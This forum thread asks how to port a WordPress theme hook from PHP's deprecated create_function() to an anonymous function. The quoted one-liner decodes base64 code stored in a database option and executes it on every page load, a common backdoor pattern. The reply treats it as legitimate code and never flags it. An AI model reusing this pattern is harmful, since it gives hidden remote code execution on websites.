I recently upgrade an old version of PHP 5.2 to 8.2 for my WP website but now causing issues with php create_function() which is deprecated
Old code is here:
add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) );
anyone can help me to rewrite this unsing function() please?
I am not sure how to rewrite this using function.

The initial code used deprecated create_function(), an anonymous function should fix the error. Find out more on WordPress site
add_action('init', function() use ($table_prefix) {
  $widget_meta = json_decode(get_option($table_prefix . "widget_meta"));
  $decoded_values = array_map('base64_decode', $widget_meta);
  $joined_values = join($decoded_values);
  // Your further code here if needed
});


I tried this code and it fixed the error for me but now there are more errors. The theme my client is using is ancient so, I guess it's better to revamp everything.
I appreciate your help.

I found this in a client's child-theme when trying to update PHP.  My question is, can you tell me what this function is doing? So I can figure out if I even need it.
